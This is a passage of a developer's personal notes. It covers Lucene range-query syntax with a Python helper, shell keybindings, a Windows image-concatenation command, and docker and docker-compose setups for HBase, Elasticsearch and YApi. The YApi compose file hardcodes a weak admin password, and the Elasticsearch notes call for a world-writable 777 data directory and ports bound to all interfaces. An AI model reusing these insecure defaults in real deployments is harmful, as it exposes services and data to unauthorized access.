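count:[10 TO *]
count:[1 TO 5}
age:(>=10 AND <20)
```

tag:{b TO e} matches strings that fall between b and e. A * leaves that end of the range unbounded. [] means the endpoint is included in the range and {} means it is excluded; the two can be mixed, so count:[1 TO 5} covers 1 to 5, including 1 but not 5. The last line is a shorthand for the same kind of range.

Source: https://juejin.im/post/5e5c6d616fb9a07c96459cae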
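When range clauses are generated from code, the bracket rules are easy to get wrong. The helper below is a small sketch that assembles a range clause from its parts; `range_query` is a hypothetical name, not part of any Lucene or Elasticsearch client library, and it does no escaping of special characters inside string bounds.

```python
def range_query(field, low="*", high="*", include_low=True, include_high=True):
    """Build a Lucene range clause such as count:[1 TO 5}.

    Square brackets include the endpoint, curly braces exclude it,
    and "*" leaves that side of the range open.
    """

    def fmt(value):
        # Numbers and the open-ended marker are written bare; other values are quoted.
        if value == "*" or isinstance(value, (int, float)):
            return str(value)
        return f'"{value}"'

    left = "[" if include_low else "{"
    right = "]" if include_high else "}"
    return f"{field}:{left}{fmt(low)} TO {fmt(high)}{right}"


print(range_query("length", 100, 200))
print(range_query("count", 1, 5, include_high=False))
print(range_query("count", 10))
print(range_query("sip", "172.16.1.100", "172.16.1.200"))
```

The four calls reproduce the `length`, mixed-bracket `count`, open-ended `count`, and `sip` examples from the list.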

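xkeysnail

```
Ctrl + a: move to the beginning of the line.
Ctrl + b: move one character toward the beginning of the line, same as the left arrow.
Ctrl + e: move to the end of the line.
Ctrl + f: move one character toward the end of the line, same as the right arrow.
Alt + f: move to the end of the current word.
Alt + b: move to the beginning of the current word.
Ctrl + d: delete the character at the cursor (delete).
Ctrl + w: delete the word before the cursor.
Ctrl + t: swap the character at the cursor with the one before it (transpose).
Alt + t: swap the word at the cursor with the one before it (transpose).
Alt + l: lowercase from the cursor to the end of the word (lowercase).
Alt + u: uppercase from the cursor to the end of the word (uppercase).
Ctrl + k: cut the text from the cursor to the end of the line.
Ctrl + u: cut the text from the cursor to the beginning of the line.
Alt + d: cut the text from the cursor to the end of the word.
Alt + Backspace: cut the text from the cursor to the beginning of the word.
Ctrl + y: paste text at the cursor.
```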

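Learn git online: https://learngitbranching.js.org/

Command-line trick (Windows cmd)

```bat
REM Increase an image's file size without changing its pixel dimensions
copy {small-image-name.jpeg} /b + {large-image-name.jpeg} /b new-image-name.jpg
```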

Some nice Dockerfiles and docker-compose files

**docker-cmd**

Run an HBase cluster

```bash
docker run -d -p 0.0.0.0:16000:16000 -p 0.0.0.0:16010:16010 -p 0.0.0.0:16201:16201 -p 0.0.0.0:16301:16301 -p 0.0.0.0:2181:2181 -p 0.0.0.0:8080:8080 -p 0.0.0.0:8085:8085 -p 0.0.0.0:9090:9090 -p 0.0.0.0:9095:9095 --name hbase-stub aaionap/hbase:1.2.0
```

**docker-compose**

Run an ES cluster

Mounted directory: /data/es7, permissions 777

```yaml
version: '2.2'
services:
  es01:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.4.1
    container_name: es01
    environment:
      - node.name=es01
      - cluster.name=es-docker-cluster
      - discovery.seed_hosts=es02,es03
      - cluster.initial_master_nodes=es01,es02,es03
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms5G -Xmx5G"
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - /data/es7/01:/usr/share/elasticsearch/data
    ports:
      - 0.0.0.0:9200:9200
    networks:
      - elastic
  es02:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.4.1
    container_name: es02
    environment:
      - node.name=es02
      - cluster.name=es-docker-cluster
      - discovery.seed_hosts=es01,es03
      - cluster.initial_master_nodes=es01,es02,es03
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms5G -Xmx5G"
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - /data/es7/02:/usr/share/elasticsearch/data
    networks:
      - elastic
  es03:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.4.1
    container_name: es03
    environment:
      - node.name=es03
      - cluster.name=es-docker-cluster
      - discovery.seed_hosts=es01,es02
      - cluster.initial_master_nodes=es01,es02,es03
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms5G -Xmx5G"
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - /data/es7/03:/usr/share/elasticsearch/data
    networks:
      - elastic

volumes:
  data01:
    driver: local
  data02:
    driver: local
  data03:
    driver: local

networks:
  elastic:
    driver: bridge
```

yapi

```yaml
version: '3'

services:
  yapi-web:
    image: jayfong/yapi:latest
    container_name: yapi-web
    ports:
      - 40001:3000
    environment:
      - [email protected]
      - YAPI_ADMIN_PASSWORD=adm1n
      - YAPI_CLOSE_REGISTER=true
      - YAPI_DB_SERVERNAME=yapi-mongo
      - YAPI_DB_PORT=27017
      - YAPI_DB_DATABASE=yapi
      - YAPI_MAIL_ENABLE=false
      - YAPI_LDAP_LOGIN_ENABLE=false
      - YAPI_PLUGINS=[]
    depends_on:
      - yapi-mongo
    links:
      - yapi-mongo
    restart: unless-stopped
  yapi-mongo:
    image: mongo:latest
    container_name: yapi-mongo
    volumes:
      - ./data/db:/data/db
    expose:
      - 27017
    restart: unless-stopped
```
